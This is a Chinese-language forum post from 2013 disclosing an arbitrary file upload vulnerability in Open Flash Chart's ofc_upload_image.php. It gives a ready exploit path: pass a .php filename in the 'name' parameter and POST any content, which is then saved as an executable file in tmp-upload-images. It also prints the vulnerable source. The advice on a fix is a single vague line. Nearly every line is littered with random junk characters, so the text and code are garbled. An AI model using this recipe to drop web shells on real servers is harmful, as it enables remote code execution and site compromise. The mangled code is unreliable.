POST 数据漏洞文件执行任意后缀文件保存
, D( c, c- e+ e. k X9 c& f4 t- ]& K 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
4 L8 _. X8 O5 h4 ~- Q% v0 ?) `1 O1 f: _, ?: w. h% {
利用:. U) R# U; ~8 }7 C9 m# y
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
3 |2 b2 c* L0 i0 ?" H( J( l4 S4 f6 M- |1 \" B
Post任意数据% H, u/ Y& f3 x; M5 b
保存位置http://localhost/chart/tmp-upload-images/hfy.php9 z; y. y/ j, N9 M& S" U3 o
# u# s; Q$ X' F& ~* M1 h# z! ?) F+ ~/ X' ] G5 ~6 V
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~( {' N: h& s" y
3 U! t, m& G' P
<?php
# M! Q7 T2 O* R
& }4 D" k. k" v. s' j. V+ k8 ^//
! @) B9 z1 l( t+ T, S// In Open Flash Chart -> save_image debug mode, you
& G/ K6 @$ d& h// will see the 'echo' text in a new window.
! M w) g; {, c//
- c1 m0 Y- y' G; T) H4 J9 k7 K' U z1 S" C- b# G- K
/*
, [& F" w& P' `+ y ] e' p. v' D
1 H" m: @( p, F2 P) oprint_r( $_GET );5 v2 F6 U1 ?- d6 M6 A5 L& z
print_r( $_POST );0 d- |! K( J! }' I0 B) Z1 U
print_r( $_FILES );
/ y( b& Z6 y9 j" n4 J; y' A2 q! B2 F
print_r( $GLOBALS );
9 Y/ g3 U0 q. v& K! B0 V4 K4 Y9 aprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
( W" r+ O; p( u, G, C; |2 M
) a7 @+ t2 j& |+ a( \" W7 F2 u*/' a! z |) A' H' J. f7 N1 a7 L
// default path for the image to be stored //
) V( R( |/ ~) I2 a7 e& z$default_path = '../tmp-upload-images/';, _0 }9 K% ?7 R: ~
4 C. @$ h' { _+ @1 A* B" o0 x$ q( W
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
7 S8 d* t5 I# Z! F+ o
, h# t; {, n+ {5 U7 c' @% w// full path to the saved image including filename //; [" {! h0 r8 J
$destination = $default_path . basename( $_GET[ 'name' ] ); ! E8 b( [" l( C" A2 `+ f
3 x+ W& K" \& Y; p& c" ~# f3 I% ^4 n
echo 'Saving your image to: '. $destination;& {" |+ Z2 b' ~2 h+ V$ T2 F" a
// print_r( $_POST );
: _2 l4 D& u. k// print_r( $_SERVER );
3 G6 q' K' p8 d. p) l// echo $HTTP_RAW_POST_DATA;, x" Q6 \* v6 Z% r4 f/ C
" @7 Q; H. y, m; R" q" z//
. M! m3 F2 P' x3 F: d// POST data is usually string data, but we are passing a RAW .png
; B3 h- `* \1 g" Z. C3 u& ~// so PHP is a bit confused and $_POST is empty. But it has saved
- o( d% O f( A" O// the raw bits into $HTTP_RAW_POST_DATA
1 u; w5 h; @6 K& e- h" V//% p& g9 }2 k5 g9 Z" J6 }: `3 }
5 E, E' w' U- t# H
$jfh = fopen($destination, 'w') or die("can't open file");
' ^% m* @" K0 e* w6 M) [fwrite($jfh, $HTTP_RAW_POST_DATA);
8 M0 W% ]* I: n8 afclose($jfh);& }/ }! c5 B @* y7 M) I% a2 Z- R
' ?4 K; C. k0 o! [3 r1 E' U5 C: m4 @4 |
//
2 W. Q- O5 T' O2 S5 z// LOOK:1 @* X; G5 b0 E0 q A H, K! C
/// z* K1 L. L; K T' b5 R# H
exit();$ Y$ N6 i$ M7 F! x+ \
//
, t/ D3 w, y. x: f1 G// PHP5:
! N& o0 `$ F; H! T. }: A/ W//
' `/ w+ ]+ M# A2 {4 P2 F7 X, ~/ V% w2 X a+ g3 \+ @+ C
* m. X. e! h5 [
// default path for the image to be stored //
- N |0 C: C- L- E. V2 p$default_path = 'tmp-upload-images/';' S9 p2 {, L" e. |/ s& m' u/ X
# N8 b* Q C: fif (!file_exists($default_path)) mkdir($default_path, 0777, true);
$ B" }5 x1 i+ S& }5 t! }, V- z7 H& D1 K! N0 h- A8 g
// full path to the saved image including filename //
- h7 p. l+ w, U- t: Y8 _$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
& F- `: ?% ]( z& f( N8 ] D d8 h ~2 G1 _( H
// move the image into the specified directory //
9 X! U6 q6 @8 r* ?7 A N5 R8 Rif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {, c" Z [) Z3 S7 X6 o
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";/ I# U+ F$ [. C' Z1 n$ r# }
} else {
" B; z* m2 s# g; e% { echo "FILE UPLOAD FAILED";9 a- x/ C% ?9 E) N
}
4 B# M2 E% a9 _4 B
6 W: a% n% k1 [/ E
, }1 R% [& ]& p8 m$ N4 _6 h# Y?>
; [1 r6 L4 A5 I$ v
' E( A* `! c- B1 f7 l4 O: Q: v) T) G! v! e! g- |: y3 ?
+ f6 I- f: }; H. Y
' L- ^& R D e/ a1 u
( H8 I5 u' s, B& o- b6 z3 ]. a2 M V+ f u2 I3 x
修复方案: 3 f. ?& I; E) [% e% i% d1 U
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 , D& D# x. d* S$ o" f
5 P& b% m) f& B* j. g
( D' `& w- |" {3 V/ z. A w0 O9 ~' D) V1 y. R2 F! E
2 h3 |3 F" t( N. \
|
发表于 2013-2-23 12:38:58
收藏
支持
反对